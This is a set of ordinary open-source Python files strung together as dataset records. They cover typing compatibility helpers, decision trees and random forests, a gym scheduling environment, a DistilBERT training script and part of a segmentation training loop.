issubclass(type.__origin__, FrozenSet)\n )\n\n def is_mapping(type):\n return type in (TypingMapping, dict) or (\n type.__class__ is _GenericAlias\n and issubclass(type.__origin__, TypingMapping)\n )\n\n bare_generic_args = {\n List.__args__,\n TypingSequence.__args__,\n TypingMapping.__args__,\n Dict.__args__,\n TypingMutableSequence.__args__,\n Tuple.__args__,\n None, # non-parametrized containers do not have `__args__ attribute in py3.7-8\n }\n\n def is_bare(type):\n return getattr(type, \"__args__\", None) in bare_generic_args\n\n def is_counter(type):\n return (\n type in (Counter, ColCounter)\n or getattr(type, \"__origin__\", None) is ColCounter\n )\n\n if is_py38:\n from typing import Literal\n\n def is_literal(type) -> bool:\n return type.__class__ is _GenericAlias and type.__origin__ is Literal\n\n else:\n # No literals in 3.7.\n def is_literal(_) -> bool:\n return False\n\n def is_generic(obj):\n return isinstance(obj, _GenericAlias)\n\n def copy_with(type, args):\n \"\"\"Replace a generic type's arguments.\"\"\"\n return type.copy_with(args)\n\nelse:\n # 3.9+\n from collections import Counter\n from collections.abc import Mapping as AbcMapping\n from collections.abc import MutableMapping as AbcMutableMapping\n from collections.abc import MutableSequence as AbcMutableSequence\n from collections.abc import MutableSet as AbcMutableSet\n from collections.abc import Sequence as AbcSequence\n from collections.abc import Set as AbcSet\n from types import GenericAlias\n from typing import Annotated\n from typing import Counter as TypingCounter\n from typing import (\n Union,\n _AnnotatedAlias,\n _GenericAlias,\n _SpecialGenericAlias,\n _UnionGenericAlias,\n )\n\n try:\n # Not present on 3.9.0, so we try carefully.\n from typing import _LiteralGenericAlias\n\n def is_literal(type) -> bool:\n return type.__class__ is _LiteralGenericAlias\n\n except ImportError:\n\n def is_literal(_) -> bool:\n return False\n\n Set = AbcSet\n AbstractSet = AbcSet\n MutableSet = AbcMutableSet\n Sequence = AbcSequence\n MutableSequence = AbcMutableSequence\n MutableMapping = AbcMutableMapping\n Mapping = AbcMapping\n FrozenSetSubscriptable = frozenset\n TupleSubscriptable = tuple\n\n def is_annotated(type) -> bool:\n return getattr(type, \"__class__\", None) is _AnnotatedAlias\n\n def is_tuple(type):\n return (\n type in (Tuple, tuple)\n or (type.__class__ is _GenericAlias and issubclass(type.__origin__, Tuple))\n or (getattr(type, \"__origin__\", None) is tuple)\n )\n\n if is_py310_plus:\n\n def is_union_type(obj):\n from types import UnionType\n\n return (\n obj is Union\n or (isinstance(obj, _UnionGenericAlias) and obj.__origin__ is Union)\n or isinstance(obj, UnionType)\n )\n\n def get_newtype_base(typ: Any) -> Optional[type]:\n if typ is NewType or isinstance(typ, NewType):\n return typ.__supertype__\n return None\n\n else:\n\n def is_union_type(obj):\n return (\n obj is Union\n or isinstance(obj, _UnionGenericAlias)\n and obj.__origin__ is Union\n )\n\n def get_newtype_base(typ: Any) -> Optional[type]:\n supertype = getattr(typ, \"__supertype__\", None)\n if (\n supertype is not None\n and getattr(typ, \"__qualname__\", \"\") == \"NewType..new_type\"\n and typ.__module__ in (\"typing\", \"typing_extensions\")\n ):\n return supertype\n return None\n\n def is_sequence(type: Any) -> bool:\n origin = getattr(type, \"__origin__\", None)\n return (\n type\n in (\n List,\n list,\n TypingSequence,\n TypingMutableSequence,\n AbcMutableSequence,\n Tuple,\n tuple,\n )\n or (\n type.__class__ is _GenericAlias\n and (\n (origin is not tuple)\n and issubclass(origin, TypingSequence)\n or origin is tuple\n and type.__args__[1] is ...\n )\n )\n or (origin in (list, AbcMutableSequence, AbcSequence))\n or (origin is tuple and type.__args__[1] is ...)\n )\n\n def is_mutable_set(type):\n return (\n type in (TypingSet, TypingMutableSet, set)\n or (\n type.__class__ is _GenericAlias\n and issubclass(type.__origin__, TypingMutableSet)\n )\n or (getattr(type, \"__origin__\", None) in (set, AbcMutableSet, AbcSet))\n )\n\n def is_frozenset(type):\n return (\n type in (FrozenSet, frozenset)\n or (\n type.__class__ is _GenericAlias\n and issubclass(type.__origin__, FrozenSet)\n )\n or (getattr(type, \"__origin__\", None) is frozenset)\n )\n\n def is_bare(type):\n return isinstance(type, _SpecialGenericAlias) or (\n not hasattr(type, \"__origin__\") and not hasattr(type, \"__args__\")\n )\n\n def is_mapping(type):\n return (\n type in (TypingMapping, Dict, TypingMutableMapping, dict, AbcMutableMapping)\n or (\n type.__class__ is _GenericAlias\n and issubclass(type.__origin__, TypingMapping)\n )\n or (\n getattr(type, \"__origin__\", None)\n in (dict, AbcMutableMapping, AbcMapping)\n )\n or issubclass(type, dict)\n )\n\n def is_counter(type):\n return (\n type in (Counter, TypingCounter)\n or getattr(type, \"__origin__\", None) is Counter\n )\n\n def is_generic(obj):\n return isinstance(obj, _GenericAlias) or isinstance(obj, GenericAlias)\n\n def copy_with(type, args):\n \"\"\"Replace a generic type's arguments.\"\"\"\n if is_annotated(type):\n # typing.Annotated requires a special case.\n return Annotated[args] # type: ignore\n return type.__origin__[args]\n\n\ndef is_generic_attrs(type):\n return is_generic(type) and has(type.__origin__)\n","repo_name":"bardadon/imdb_data_engineering","sub_path":"lib/python3.10/site-packages/cattrs/_compat.py","file_name":"_compat.py","file_ext":"py","file_size_in_byte":11903,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"43"} +{"seq_id":"41136925554","text":"import numpy as np\nfrom math import ceil\nfrom collections import Counter\nfrom random import randint\n\n\nclass Node():\n def __init__(self, split=None, left=None, right=None, label=None):\n self.split = split\n self.left = left\n self.right = right\n self.label = label\n\n def isLeaf(self):\n if self.label == None:\n return False\n return True\n\n\nclass DecisionTree():\n def __init__(self, max_height=None):\n self.root = None\n self.max_height = max_height\n\n\n def grow(self, data, labels, curr_depth, max_depth):\n if np.unique(labels).size == 1:\n return Node(label=labels[0])\n\n feature, threshold = self.segmentor(data, labels)\n\n if curr_depth == max_depth or not feature:\n c = Counter(labels)\n mode = c.most_common(1)[0][0]\n return Node(label=mode)\n\n cond = (data[:,feature] < threshold)\n X_l = data[cond]\n Y_l = labels[cond]\n X_r = data[~cond]\n Y_r = labels[~cond] \n\n leftTree = self.grow(X_l, Y_l, curr_depth+1, max_depth)\n rightTree = self.grow(X_r, Y_r, curr_depth+1, max_depth)\n\n return Node(split=(feature, threshold), left=leftTree, right=rightTree)\n\n def impurity(self, Y_l, Y_r):\n H_l = self.entropy(Y_l)\n H_r = self.entropy(Y_r)\n return float((len(Y_l) * H_l) + (len(Y_r) * H_r)) / float(len(Y_l) + len(Y_r))\n\n def entropy(self, Y):\n p_1 = float(Y.sum()) / float(len(Y))\n p_0 = 1. - p_1\n\n if p_0 == 0:\n h_0 = 0 \n if p_1 == 0:\n h_1 = 0 \n if p_0 != 0:\n h_0 = -p_0 * np.log2(p_0)\n if p_1 != 0:\n h_1 = -p_1 * np.log2(p_1)\n \n return h_0 + h_1\n\n\n def compress_features(self, vec):\n uniq = np.unique(vec)\n if uniq.size > 1000:\n rnd = lambda x: int(ceil(x / 10000.0))*10000\n return np.unique(map(rnd, uniq))\n elif np.array_equal(uniq, [0,1]):\n return [1]\n return uniq\n\n def segmentor(self, data, labels):\n best_feat = None \n best_threshold = None\n best_impurity = float('inf')\n\n for i in range(len(data.T)):\n feat_vec = data.T[i]\n\n for threshold in self.compress_features(feat_vec):\n cond = (data[:,i] < threshold)\n Y_l = labels[cond]\n Y_r = labels[~cond] \n\n if len(Y_l) == 0 or len(Y_r) == 0: \n continue\n\n curr_impurity = self.impurity(Y_l, Y_r)\n\n if curr_impurity < best_impurity:\n best_feat, best_threshold = i, threshold\n best_impurity = curr_impurity\n\n return (best_feat, best_threshold)\n\n\n def train(self, data, labels):\n self.root = self.grow(data, labels, 0, self.max_height)\n\n def predict(self, data): \n predictions = []\n for i in range(len(data)):\n x = data[i]\n curr = self.root\n while curr.isLeaf() == False:\n feat, thresh = curr.split\n if (i == 1):\n print(feat, thresh)\n if (x[feat] >= thresh):\n curr = curr.right\n else:\n curr = curr.left\n \n predictions.append(curr.label)\n\n\n return np.asarray(predictions).ravel()\n\n\n\nclass RandomForest():\n def __init__(self, num_trees, max_height=None):\n self.num_trees = num_trees\n self.max_height = max_height\n trees = []\n for x in range(num_trees):\n trees.append(DecisionTree(max_height=max_height))\n self.trees = trees\n\n def train(self, data, labels):\n numSamples = data.shape[0] / self.num_trees\n for i in range(self.num_trees):\n rand = np.random.choice(data.shape[0], numSamples)\n self.trees[i].train(data[rand], labels[rand])\n\n def predict(self, data):\n predictions = []\n for tree in self.trees:\n predictions.append(tree.predict(data))\n avg_preds = np.average(predictions, axis=0)\n for i in range(len(avg_preds)):\n if avg_preds[i] >= 0.5:\n avg_preds[i] = 1\n else:\n avg_preds[i] = 0\n return avg_preds\n\n","repo_name":"kiarashm/DecisionTrees","sub_path":"ForestFires.py","file_name":"ForestFires.py","file_ext":"py","file_size_in_byte":4336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18953350979","text":"import logging\n\nimport enum\n\nfrom gosa.common.components.jsonrpc_utils import JSONDataHandler\nfrom sqlalchemy.dialects import postgresql\n\n__import__('pkg_resources').declare_namespace(__name__)\n\n\nclass BackendTypes(enum.Enum):\n unknown = 0\n active_master = 1\n standby_master = 2\n proxy = 3\n\n\nclass BackendTypesEncoder(JSONDataHandler):\n @staticmethod\n def encode(data):\n return {\"__enum__\": str(data), '__jsonclass__': 'gosa.backend.utils.BackendTypes'}\n\n @staticmethod\n def decode(data):\n name, member = data[\"__enum__\"].split(\".\")\n return getattr(BackendTypes, member)\n\n @staticmethod\n def isinstance(data):\n return isinstance(data, BackendTypes)\n\n @staticmethod\n def canhandle():\n return \"gosa.backend.utils.BackendTypes\"\n\n\ndef print_query(query_result):\n try:\n return str(query_result.statement.compile(dialect=postgresql.dialect(), compile_kwargs={\"literal_binds\": True}))\n except Exception as e:\n logging.getLogger(__name__).warning(str(e))\n return str(query_result)\n pass","repo_name":"gonicus/gosa","sub_path":"backend/src/gosa/backend/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"43"} +{"seq_id":"28866875231","text":"# -*- coding: utf-8 -*-\nimport gym\nimport numpy as np\n\nfrom .scheduler import Scheduler\nfrom .obs import Observation\n\nfrom .EnvirConf import envConfig as ec\nfrom .EnvirConf import obConfig as oc\n\nclass ScheEnv(gym.Env):\n def __init__(self, seed = 0, mode=None):\n self.envConfig = ec\n self.obsConfig = oc\n \n self.partNum = self.envConfig.partNum\n self.machNum = self.envConfig.machNum\n \n self.sche = Scheduler(mode,seed)\n self.obsGen = Observation(self.sche)\n self.actObsInit()\n \n def reset(self):\n self.sche.reset()\n canvas_obs = self.obsGen.getState()\n return canvas_obs\n \n def step(self, action):\n reward = self.sche.step(action[0])#mult-actions frame\n other_reward , done , grade = self.sche.is_end()\n \n canvas_obs = self.obsGen.getState()\n reward += other_reward\n info = {}\n if done:\n info['episode'] = {'r':round(grade)}\n return canvas_obs,reward,done,info\n \n def getActionMask(self):\n vObs = np.array([0],dtype=np.float)\n partAvai = self.sche.available()\n \n partMask = np.zeros(self.partNum)\n partMask[partAvai] = 1\n return vObs,partMask\n \n def actObsInit(self):\n self.action_space = [\n gym.spaces.Discrete(self.partNum),\n ]\n \n self.observation_space = gym.spaces.Box(\n low=0,\n high=1,\n shape=(self.obsGen.feaNum,self.obsGen.feaWidth,\\\n self.obsGen.feaHeight),\n dtype=np.float32,\n )\n \n self.observation_space_value = gym.spaces.Box(\n low=-1,\n high=1,\n shape=(1,),\n dtype=np.float32,\n )\n\n\n\nif __name__ == '__main__':\n value = 0\n stateLi = []\n vLi = []\n a = ScheEnv(0,'train')\n state = a.reset()\n done = False\n while not done:\n v_obs, avai = a.getActionMask()\n act = np.random.choice(avai)\n state, reward, done, info = a.step(act)\n stateLi.append(state)\n vLi.append(v_obs)\n value += reward\n print(info['episode']['r'])\n print(value)\n","repo_name":"tjdx-schedule/AlphaSchedule","sub_path":"ppo_policyV0.040/a2c_ppo_acktr/game/scheEnv.py","file_name":"scheEnv.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"36536996000","text":"# product of list \n# print all the element of the list\ndef product_of_a_list(list):\n product = 1\n indexOfList = 0\n \n while indexOfList < len(list):\n product = product * list[indexOfList]\n indexOfList = indexOfList + 1\n \n return product\n\n\ne = product_of_a_list([2, 2, 3, 4, 5])\nprint(e)\n\ndef elements_of_a_list(list):\n index = 0\n while index < len(list):\n element = list[index]\n print (list[index])\n index = index + 1\n\n\n\nd = elements_of_a_list([7, 10, 1, 2, 3, 4, 5])","repo_name":"NickTheGodOfTime/edabit","sub_path":"homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36763090377","text":"sol = True\nl = []\n\nfor i in range(10):\n n = l.append(int(input()))\nx = int(input())\nfor j in l:\n if j%x == 0:\n sol = False\n\nif sol:\n print(\"OK\",end=\"\")\nelse:\n print(\"NO\",end=\"\")","repo_name":"Antoo22D/Exercisce_Python_UNIVERSITY","sub_path":"N36.py","file_name":"N36.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"31637631718","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\n\ntarget = \"./\"\nraw = pd.read_csv(\"../train.csv\")\n\ntrain, test = train_test_split(raw, train_size=0.8)\ntrain, valid = train_test_split(train, train_size=0.8)\n\ny_train = train['label'].tolist()\nX_train = train.drop('label', axis=1).transpose()\nwith open(f\"{target}train_lab.csv\", \"w\") as f:\n f.writelines([f\"{k}\\t{j}\\n\" for k, j in enumerate(y_train)])\nX_train.to_hdf(f\"{target}train.h5\", key='dge', mode='w', complevel=3)\n\ny_valid = valid['label'].tolist()\nX_valid = valid.drop('label', axis=1).transpose()\nwith open(f\"{target}test_lab.csv\", \"w\") as f:\n f.writelines([f\"{k}\\t{j}\\n\" for k, j in enumerate(y_valid)])\nX_valid.to_hdf(f\"{target}test.h5\", key='dge', mode='w', complevel=3)\n\ny_test = test['label'].tolist()\nX_test = test.drop('label', axis=1).transpose()\nwith open(f\"{target}test/test_lab.csv\", \"w\") as f:\n f.writelines([f\"{k}\\t{j}\\n\" for k, j in enumerate(y_test)])\nX_test.to_hdf(f\"{target}test/test.h5\", key='dge', mode='w', complevel=3)\n","repo_name":"lidh15/vvppcc22","sub_path":"data/test_steps/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"25426367917","text":"import time\nimport random\nimport pandas as pd\nfrom glob import glob\nimport argparse\nimport json\nimport subprocess\nimport sys\nimport os\nimport tensorflow as tf\nfrom transformers import DistilBertTokenizer\nfrom transformers import TFDistilBertForSequenceClassification\nfrom transformers import TextClassificationPipeline\nfrom transformers.configuration_distilbert import DistilBertConfig\nimport wandb\nMAX_SEQ_LENGTH = 128\n\nimport optuna\nfrom functools import partial\n\nclass Train():\n def __init__(self):\n self.epochs=3\n self.learning_rate = 0.00001\n self.epsilon = 0.00000001\n self.train_batch_size=128\n self.validation_batch_size=128\n self.test_batch_size=128\n self.train_steps_per_epoch=100\n self.validation_steps=100\n self.test_steps=100\n self.train_instance_count=1\n self.train_instance_type='ml.c5.9xlarge'\n self.train_volume_size=1024\n self.use_xla=True\n self.use_amp=True\n self.freeze_bert_layer=False\n self.enable_sagemaker_debugger=True\n self.enable_checkpointing=False\n self.enable_tensorboard=False\n self.input_mode='Pipe'\n self.run_validation=True\n self.run_test=True\n self.run_sample_predictions = True\n self.train_dataset = None\n self.validation_dataset = None\n self.test_dataset = None\n self.model = None\n self.callbacks = [] \n\n def select_data_and_label_from_record(self,record):\n x = {\n 'input_ids': record['input_ids'],\n 'input_mask': record['input_mask'],\n 'segment_ids': record['segment_ids']\n }\n y = record['label_ids']\n\n return (x, y)\n\n def file_based_input_dataset_builder(self,\n channel,\n input_filenames,\n pipe_mode,\n is_training,\n drop_remainder):\n\n # For training, we want a lot of parallel reading and shuffling.\n # For eval, we want no shuffling and parallel reading doesn't matter.\n\n if pipe_mode:\n print('***** Using pipe_mode with channel {}'.format(channel))\n from sagemaker_tensorflow import PipeModeDataset\n dataset = PipeModeDataset(channel=channel,\n record_format='TFRecord')\n else:\n print('***** Using input_filenames {}'.format(input_filenames))\n dataset = tf.data.TFRecordDataset(input_filenames)\n\n dataset = dataset.repeat(100)\n dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n\n name_to_features = {\n \"input_ids\": tf.io.FixedLenFeature([MAX_SEQ_LENGTH], tf.int64),\n \"input_mask\": tf.io.FixedLenFeature([MAX_SEQ_LENGTH], tf.int64),\n \"segment_ids\": tf.io.FixedLenFeature([MAX_SEQ_LENGTH], tf.int64),\n \"label_ids\": tf.io.FixedLenFeature([], tf.int64),\n }\n\n def _decode_record(record, name_to_features):\n \"\"\"Decodes a record to a TensorFlow example.\"\"\"\n return tf.io.parse_single_example(record, name_to_features)\n \n dataset = dataset.apply(\n tf.data.experimental.map_and_batch(\n lambda record: _decode_record(record, name_to_features),\n # batch_size=8,\n batch_size=64,\n drop_remainder=drop_remainder,\n num_parallel_calls=tf.data.experimental.AUTOTUNE))\n\n dataset.cache()\n\n if is_training:\n dataset = dataset.shuffle(seed=42,\n buffer_size=10,\n reshuffle_each_iteration=True)\n return dataset\n\n def read_training_data(self, filepath):\n train_data = filepath\n train_data_filenames = glob('{}.tfrecord/*'.format(train_data))\n \n print('train_data_filenames {}'.format(train_data_filenames))\n\n self.train_dataset = self.file_based_input_dataset_builder(\n channel='train',\n input_filenames=train_data_filenames,\n pipe_mode=False,\n is_training=True,\n drop_remainder=False).map(self.select_data_and_label_from_record)\n \n def read_validation_data(self, filepath):\n validation_data = filepath\n validation_data_filenames = glob('{}.tfrecord/*'.format(validation_data))\n print('validation_data_filenames {}'.format(validation_data_filenames))\n\n self.validation_dataset = self.file_based_input_dataset_builder(\n channel='validation',\n input_filenames=validation_data_filenames,\n pipe_mode=False,\n is_training=False,\n drop_remainder=False).map(self.select_data_and_label_from_record)\n \n def read_test_data(self, filepath):\n test_data = filepath\n test_data_filenames = glob('{}.tfrecord/*'.format(test_data))\n print(test_data_filenames)\n self.test_dataset = self.file_based_input_dataset_builder(\n channel='test',\n input_filenames=test_data_filenames,\n pipe_mode=False,\n is_training=False,\n drop_remainder=False).map(self.select_data_and_label_from_record)\n \n def load_pretrained_bert_model(self):\n CLASSES = [1, 2, 3, 4, 5, 6,7]\n \n config = DistilBertConfig.from_pretrained('distilbert-base-uncased',\n num_labels=len(CLASSES))\n \n self.model = TFDistilBertForSequenceClassification.from_pretrained('distilbert-base-uncased', \n config=config)\n\n def setup_custom_classifier_model(self):\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)\n metric=tf.keras.metrics.SparseCategoricalAccuracy('accuracy')\n\n optimizer=tf.keras.optimizers.Adam(learning_rate=self.learning_rate, epsilon=self.epsilon)\n self.model.compile(optimizer=optimizer, loss=loss, metrics=[metric])\n self.model.layers[0].trainable=not self.freeze_bert_layer\n self.model.summary()\n\n log_dir = './tmp/tensorboard/'\n tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir)\n \n self.callbacks.append(tensorboard_callback)\n\n history = self.model.fit(self.train_dataset,\n shuffle=True,\n epochs=self.epochs,\n steps_per_epoch=self.train_steps_per_epoch,\n validation_data=self.validation_dataset,\n validation_steps=self.validation_steps,\n callbacks=self.callbacks,\n batch_size=1)\n\n def evaluate_model(self):\n test_history = self.model.evaluate(self.test_dataset,\n steps=self.test_steps, \n callbacks=self.callbacks)\n print(\"model evaluation: {}\".format(test_history))\n \n def save_model(self, filename):\n model_dir = './tmp/'\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n filepath = model_dir + filename\n self.model.save_pretrained(filepath)\n \n def init_sweep(self):\n sweep_config = {\n \"name\": \"vanilla-sweep-batch-16\",\n \"method\": \"bayes\",\n \"metric\": {\"name\": \"accuracy\", \"goal\": \"maximize\"},\n \"parameters\": {\n \"num_train_epochs\": {\"min\": 1, \"max\": 10},\n \"learning_rate\": {\"min\": 0, \"max\": 4e-4},\n },\n \"early_terminate\": {\"type\": \"hyperband\", \"min_iter\": 60}\n }\n hyperparameter_defaults = dict(\n shuffle=True,\n epochs=self.epochs,\n steps_per_epoch=self.train_steps_per_epoch,\n validation_data=self.validation_dataset,\n validation_steps=self.validation_steps,\n callbacks=self.callbacks,\n batch_size=1\n )\n wandb.init(project=\"bert-opt\", sync_tensorboard=True,config=hyperparameter_defaults)\n \n def optimize(self,trial):\n\n epochs = trial.suggest_int(\"epochs\",1,3)\n steps_per_epoch=trial.suggest_int(\"steps_per_epoch\",10,100)\n validation_steps=trial.suggest_int(\"validation_steps\",10,100)\n\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)\n metric=tf.keras.metrics.SparseCategoricalAccuracy('accuracy')\n\n optimizer=tf.keras.optimizers.Adam(learning_rate=self.learning_rate, epsilon=self.epsilon)\n self.model.compile(optimizer=optimizer, loss=loss, metrics=[metric])\n self.model.layers[0].trainable=not self.freeze_bert_layer\n self.model.summary()\n\n log_dir = './tmp/tensorboard/'\n tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir)\n \n self.callbacks.append(tensorboard_callback)\n print(\"[debug] fit model...................................\")\n history = self.model.fit(self.train_dataset,\n shuffle=True,\n epochs=epochs,\n steps_per_epoch=steps_per_epoch,\n validation_data=self.validation_dataset,\n validation_steps=validation_steps,\n # callbacks=self.callbacks,\n batch_size=None,\n verbose=2)\n \n self.evaluate_model()\n\ndef main():\n train = Train()\n train.read_training_data('output_train_data')\n train.read_validation_data('output_validation_data')\n train.read_test_data('output_test_data')\n train.load_pretrained_bert_model()\n\n optimization_function = partial(train.optimize)\n study = optuna.create_study(direction=\"minimize\")\n study.optimize(optimization_function, n_trials=15)\n # train.setup_custom_classifier_model()\n # train.evaluate_model()\n train.save_model(\"model\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"ianovski/google-play-store-nlp","sub_path":"src/local_run/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10021,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"29864668854","text":"from json2html import json2html\nimport config as cfg\n\n\ndef clean_html():\n with open(cfg.html_output, 'w') as newpull:\n newpull.write(\"\")\n newpull.write('')\n newpull.write(\"\")\n newpull.write('')\n newpull.write(\" Find Da Job\")\n newpull.write(\"\")\n newpull.write(\"\")\n newpull.close()\n\n\ndef html_builder(result_write, placement):\n with open(cfg.html_output, 'a') as myFile:\n if placement == \"text\":\n myFile.write(\"Apply Here: \")\n myFile.write(json2html.convert(result_write).encode('ascii', 'ignore').decode('ascii'))\n myFile.write('
')\n myFile.close()\n elif placement == \"html\":\n try:\n myFile.write(result_write)\n myFile.write('
')\n myFile.close()\n except:\n myFile.write(json2html.convert(result_write).encode('ascii', 'ignore').decode('ascii'))\n myFile.write('
')\n myFile.close()\n elif placement == \"nltk\":\n myFile.write(\"Most Common Words: \")\n myFile.write(json2html.convert(result_write).encode('ascii', 'ignore').decode('ascii'))\n myFile.write('
')\n myFile.write('
')\n myFile.close()\n elif placement == \"resume\":\n myFile.write(\"

Current Resume Keywords

\")\n myFile.write(result_write)\n myFile.write('
')\n myFile.close()\n else:\n print(\"Using Defaut placement\")\n myFile.write(\"

Current Resume Keywords

\")\n myFile.write(result_write)\n myFile.write('
')\n myFile.close()\n\n\ndef close_html():\n with open(cfg.html_output, 'a') as newpull:\n newpull.write(\"\")\n newpull.write(\"\")\n newpull.close()\n","repo_name":"Zeerg/jobsearch","sub_path":"modules/html_builder.py","file_name":"html_builder.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"26091322381","text":"from settings_args import *\nimport torch.nn.functional as F\nfrom torch.backends import cudnn\nfrom utils import utils\nfrom torch.utils.data import DataLoader\nimport torch\nimport torch.nn as nn\nimport torchvision\nfrom torch.optim.lr_scheduler import CosineAnnealingLR\nfrom torch.utils.tensorboard import SummaryWriter\nimport os\nfrom utils.loss import DiceLoss\nfrom tqdm import tqdm\nimport csv\nimport random\nimport numpy as np\nfrom PIL import Image\nimport time\nimport torchsummary\nfrom torchvision.utils import save_image, make_grid\nfrom DNN_printer import DNN_printer\nfrom model.OCT2Former import OCT2Former\nimport sys\n\nsys.setrecursionlimit(100000)\n\ndef main(args, num_fold=0):\n torch.set_num_threads(1)\n model = OCT2Former(in_chans=args.in_channel, num_classes=args.n_class,\n embed_dims=args.vit_dims, k=args.token_dim,\n num_heads=[2, 4, 4, 8, 16], mlp_ratios=[4, 4, 4, 4, 4], \n depths=args.depths, aux=args.aux, spec_inter=args.spec_interpolation)\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model.to(device)\n\n if args.mode == \"train\":\n train(model, device, args, num_fold=num_fold)\n\n elif args.mode == \"test\":\n return test(model, device, args, num_fold=num_fold)\n\n else:\n raise NotImplementedError\n\n\n\n\ndef train(model, device, args, num_fold=0):\n dataset_train = myDataset(args.data_root, args.target_root, args.crop_size, \"train\",\n k_fold=args.k_fold, imagefile_csv=args.dataset_file_list, num_fold=num_fold, data_root_aux=args.data_root_aux, img_aug=args.img_aug)\n dataloader_train = DataLoader(dataset_train, batch_size=args.batch_size, shuffle=True,\n num_workers=args.num_workers, pin_memory=True, drop_last=True) \n num_train_data = len(dataset_train)\n dataset_val = myDataset(args.data_root, args.target_root, args.crop_size, \"val\",\n k_fold=args.k_fold, imagefile_csv=args.dataset_file_list, num_fold=num_fold, data_root_aux=args.data_root_aux)\n dataloader_val = DataLoader(dataset_val, batch_size=args.batch_size, shuffle=False,\n num_workers=args.num_workers, pin_memory=True, drop_last=True) \n num_train_val = len(dataset_val) \n ####################################################################################################################\n writer = SummaryWriter(log_dir=args.log_dir[num_fold], comment=f'tb_log')\n\n opt = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.weight_decay)\n\n criterion = nn.CrossEntropyLoss(torch.tensor(args.class_weight, device=device))\n criterion_dice = DiceLoss()\n\n cp_manager = utils.save_checkpoint_manager(5) \n step = 0\n\n for epoch in range(args.num_epochs):\n model.train()\n lr = utils.poly_learning_rate(args, opt, epoch) \n lr = opt.param_groups[-1]['lr']\n with tqdm(total=num_train_data, desc=f'[Train] fold[{num_fold}/{args.k_fold}] Epoch[{epoch + 1}/{args.num_epochs} LR={lr:.8f}] ', unit='img') as pbar:\n for batch in dataloader_train:\n step += 1\n image = batch[\"image\"]\n label = batch[\"label\"]\n assert len(image.size()) == 4\n assert len(label.size()) == 3\n\n image = image.to(device, dtype=torch.float32)\n label = label.to(device, dtype=torch.long)\n\n opt.zero_grad()\n \n outputs = model(image)\n main_out = outputs[\"main_out\"]\n\n diceloss = criterion_dice(main_out, label)\n celoss = criterion(main_out, label)\n totall_loss = celoss\n\n if \"aux_out\" in outputs.keys():\n aux_losses = 0\n for aux in outputs[\"aux_out\"]:\n label_aux = label\n auxloss = (criterion_dice(aux, label)) * args.aux_weight \n totall_loss += auxloss\n aux_losses += auxloss\n\n totall_loss.backward()\n opt.step()\n\n if step % 5 == 0:\n if args.aux:\n writer.add_scalar(\"Train/aux_losses\",aux_losses, step)\n writer.add_scalar(\"Train/Totall_loss\", totall_loss.item(), step)\n writer.add_scalar(\"Train/lr\", lr, step)\n\n pbar.set_postfix(**{'loss': totall_loss.item()}) \n pbar.update(args.batch_size)\n \n if (epoch+1) % args.val_step == 0:\n mDice, mIoU, mAcc, mSensitivity, mSpecificity, mAuc, mBACC = val(model, dataloader_val, num_train_val, device, args)\n writer.add_scalar(\"Valid/Dice_val\", mDice, step)\n writer.add_scalar(\"Valid/IoU_val\", mIoU, step)\n writer.add_scalar(\"Valid/Acc_val\", mAcc, step)\n writer.add_scalar(\"Valid/Auc_val\", mAuc, step)\n writer.add_scalar(\"Valid/Sen_val\", mSensitivity, step)\n writer.add_scalar(\"Valid/Spe_val\", mSpecificity, step)\n writer.add_scalar(\"Valid/bacc_val\", mBACC, step)\n val_result = [num_fold, epoch+1, mDice, mIoU, mAcc, mAuc, mSensitivity, mSpecificity, mBACC]\n with open(args.val_result_file, \"a\") as f:\n w = csv.writer(f)\n w.writerow(val_result)\n cp_manager.save(model, opt, os.path.join(args.checkpoint_dir[num_fold], f'CP_epoch{epoch + 1}.pth'), float(mDice))\n\n\ndef val(model, dataloader, num_train_val, device, args):\n all_dice = []\n all_iou = []\n all_acc = []\n all_auc = []\n all_sen = []\n all_spe = []\n all_bacc = []\n model.eval()\n with torch.no_grad():\n with tqdm(total=num_train_val, desc=f'VAL', unit='img') as pbar:\n for batch in dataloader:\n image = batch[\"image\"]\n label = batch[\"label\"]\n file = batch[\"file\"]\n assert len(image.size()) == 4\n assert len(label.size()) == 3\n image = image.to(device, dtype=torch.float32)\n label = label.to(device, dtype=torch.long)\n outputs = model(image)\n main_out = outputs[\"main_out\"]\n main_out = torch.exp(main_out).max(dim=1)[1] \n\n for b in range(image.size()[0]):\n file_name, _ = os.path.splitext(file[b])\n hist = utils.fast_hist(label[b, :, :], main_out[b, :, :], args.n_class)\n dice, iou, acc, Sensitivity, Specificity, BACC = utils.cal_scores(hist.cpu().numpy())\n auc = utils.calc_auc(main_out[b, :, :], label[b, :, :])\n all_dice.append(list(dice))\n all_iou.append(list(iou))\n 